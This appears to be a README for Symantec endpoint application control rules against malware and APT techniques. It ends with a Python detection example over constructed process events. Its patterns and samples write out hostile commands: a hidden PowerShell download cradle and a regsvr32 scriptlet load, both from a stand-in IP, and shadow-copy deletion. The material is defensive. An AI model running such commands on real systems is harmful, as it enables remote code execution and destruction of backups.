application control rules which cover most of the malware and APT detection and protection.
These rules were created after an intense study of discovered advanced attacks that breached organizations.
These rules were implemented in a 5000+ host organization up until version 4.
That's a diagram I have made which is the basis on which I am building my rules.
******** You should use these rules in TEST (LOG ONLY) mode at first - it is important to make all the necessary exceptions for your organization ********
3) Each rule that has 0 false positives after a week or so - start changing that rule to "block"
______________________________________________________________________________________________
APT attack incidents that would have failed against SEP with these rules:
https://www.scmagazineuk.com/muddywater-apt-campaign-flowing-again-targets-us-near-east/article/750526/ - March 13, 2018
https://www.securityweek.com/china-linked-spies-used-new-malware-uk-government-attack - March 12, 2018
https://www.symantec.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions - 28 Feb, 2018
______________________________________________________________________________________________
RULES:
Protect against misuse of user folders
Detect UAC changes
Added more LOLBins protection
Protect startup entries
Prevent vulnerable Adobe apps from running scripts
Prevent cmd from launching batch files or scripts
Log scripts that access documents
Prevent cscript and wscript from launching cmd or PowerShell
Prevent Office apps from launching scripts, HTA, cmd, scr, wmic
Log Office access to executables
Prevent browsers from running scripts, cmd
Log browser access to executables
Prevent WinRM from launching processes or accessing files
Prevent PowerShell from launching regsvr32.exe
Prevent processes from launching PowerShell with arguments that download files or run silent, unrestricted and more
Prevent processes from deleting shadow copies
Prevent applications from running scripts from TEMP, APPDATA and more
Block known unwanted applications like uTorrent, DameWare, LastPass and log cracks, serials and more
Block launching of PsExec --- (can also be done using IPS, by the way, to block lateral movement)
Block some fileless malware from downloading and executing via PowerShell
Block creation and execution of scripts and executables from common malware-related locations
Block Java from running generic Adwind variants
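The rules above live in SEP application control policy, so the engine below is an added example (not the repository's rules and not Symantec's engine): a few of the listed parent/child and command-line rules written as Python predicates and run over constructed Sysmon-style process-creation events, with the "log only" versus "block" distinction and the "promote after zero false positives" step from the rollout notes at the top. Rule names, the event fields (parent, image, cmdline), the regex patterns and the sample events are this example's own assumptions, not the repository's.

```python
"""Stand-in rule engine for staging application control rules (added example,
not the repository's own SEP rules).  A handful of the listed parent/child and
command-line rules are expressed as predicates and run over constructed
process-creation events, so a "log only" period can be reviewed per rule
before any rule is flipped to block."""
import re
from collections import Counter

SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "powershell.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
BROWSERS = {"chrome.exe", "firefox.exe", "iexplore.exe", "msedge.exe"}

# "PowerShell with arguments that download files or run silent, unrestricted"
PS_SUSPICIOUS_ARGS = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"
    r"|-e(nc|ncodedcommand)?\s|-w(indowstyle)?\s+hidden"
    r"|-ep\s+(bypass|unrestricted)|-executionpolicy\s+(bypass|unrestricted))",
    re.IGNORECASE,
)
# "scripts from TEMP, APPDATA and more": a script file under a user-writable
# directory anywhere on the command line (directory list is an assumption)
SCRIPT_IN_USER_DIR = re.compile(
    r"\\(temp|appdata|programdata|users\\public)\\[^\s\"]*\.(vbs|js|ps1|hta|bat|cmd|wsf)\b",
    re.IGNORECASE,
)


def image_name(path):
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def parent_child(parents, children):
    """Predicate: a parent image in `parents` launched a child image in `children`."""
    return lambda e: image_name(e["parent"]) in parents and image_name(e["image"]) in children


def shadow_copy_deletion(e):
    """Mirrors 'prevent processes from deleting shadow copies' (three common forms)."""
    img, cl = image_name(e["image"]), e["cmdline"].lower()
    return ((img == "vssadmin.exe" and "delete shadows" in cl)
            or (img == "wmic.exe" and "shadowcopy" in cl and "delete" in cl)
            or (img == "powershell.exe" and "win32_shadowcopy" in cl and "delete" in cl))


# Rule name -> predicate over one event {"parent", "image", "cmdline"} (names are this example's own).
RULES = {
    "office_launches_script_hta_cmd_wmic": parent_child(OFFICE_APPS, SCRIPT_HOSTS | {"cmd.exe", "wmic.exe"}),
    "browser_launches_script_or_cmd": parent_child(BROWSERS, SCRIPT_HOSTS | {"cmd.exe"}),
    "script_host_launches_cmd_or_powershell": parent_child({"cscript.exe", "wscript.exe"},
                                                           {"cmd.exe", "powershell.exe"}),
    "powershell_launches_regsvr32": parent_child({"powershell.exe"}, {"regsvr32.exe"}),
    "powershell_suspicious_args": lambda e: image_name(e["image"]) == "powershell.exe"
    and PS_SUSPICIOUS_ARGS.search(e["cmdline"]) is not None,
    "shadow_copy_deletion": shadow_copy_deletion,
    "script_from_user_writable_dir": lambda e: image_name(e["image"]) in SCRIPT_HOSTS | {"cmd.exe"}
    and SCRIPT_IN_USER_DIR.search(e["cmdline"]) is not None,
}


def matching_rules(event):
    """Names of every rule that fires on one event."""
    return [name for name, pred in RULES.items() if pred(event)]


def evaluate(events, block_rules=frozenset()):
    """Every match is logged (counted per rule); an event counts as blocked only if
    one of its matching rules is in block_rules.  Returns (hits per rule, blocked events)."""
    hits = Counter({name: 0 for name in RULES})
    blocked = []
    for e in events:
        matched = matching_rules(e)
        hits.update(matched)
        if any(r in block_rules for r in matched):
            blocked.append(e)
    return hits, blocked


def ready_to_block(hits, reviewed_false_positives):
    """Rollout step from the notes above: after the log-only period, promote rules that
    fired and whose hits were all judged true positives (0 false positives).
    reviewed_false_positives maps rule name -> number of logged hits judged benign."""
    return {r for r in RULES if hits[r] > 0 and reviewed_false_positives.get(r, 0) == 0}


# Constructed sample events (not real telemetry); paths and IPs are made up.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",   # benign PDF open
     "image": r"C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe",
     "cmdline": r'"AcroRd32.exe" C:\Users\alice\Downloads\invoice.pdf'},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",   # macro download cradle
     "image": PS,
     "cmdline": r"powershell.exe -w hidden -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')"},
    {"parent": r"C:\Windows\System32\wscript.exe",                               # dropper chains to cmd
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\alice\AppData\Local\Temp\run.bat"},
    {"parent": r"C:\Users\alice\AppData\Roaming\updater.exe",                    # ransomware-style
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": r"vssadmin.exe delete shadows /all /quiet"},
    {"parent": r"C:\Windows\System32\userinit.exe",                              # benign logon script
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c \\corp.example\SYSVOL\corp.example\scripts\logon.bat"},
    {"parent": PS,                                                               # regsvr32 scriptlet
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /u /i:http://203.0.113.5/x.sct scrobj.dll"},
]

if __name__ == "__main__":
    hit_counts, _ = evaluate(SAMPLE_EVENTS)              # log-only pass
    for rule, n in sorted(hit_counts.items()):
        print(f"{n:3d}  {rule}")
    print("ready to block:", sorted(ready_to_block(hit_counts, {"powershell_suspicious_args": 1})))
```

The two benign events (Acrobat from Outlook, the SYSVOL logon script from userinit) fire nothing, which is the point of the log-only week: the patterns are deliberately narrow, and whatever a real estate does fire on (signed installers running from APPDATA, admin scripts in TEMP) is what becomes the exception list before the rule goes to block.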